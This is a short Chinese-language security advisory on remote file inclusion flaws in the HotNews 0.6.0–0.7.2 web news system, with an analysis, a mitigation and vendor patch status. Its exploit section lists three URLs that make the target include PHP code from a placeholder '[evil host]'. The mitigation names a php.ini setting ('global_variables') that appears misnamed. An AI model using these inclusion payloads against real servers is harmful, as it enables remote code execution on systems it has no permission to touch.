添加时间:
2005-08-16

系统编号:
WAVDB-00366
BUGTRAQ: 9357

影响版本:
HotNews 0.6.0-0.7.2

程序介绍:

HotNews是一款基于WEB的新闻发布系统。

漏洞分析:

HotNews存在多个文件包含问题，远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
问题存在于hotnews-engine.inc.php3和hnmain.inc.php3中，这两个脚本对用户提交给"config[header]"和"config[incdir]"的URI参数缺少充分过滤，提交包含远程服务器上的恶意文件，可能以WEB进程权限执行恶意PHP脚本上的任意命令。

漏洞利用:

http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evilfile]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3


解决方案:
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 在php.ini中关闭如下参数：
global_variables为off

厂商补丁：
HotNews
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://hotnews.sourceforge.net/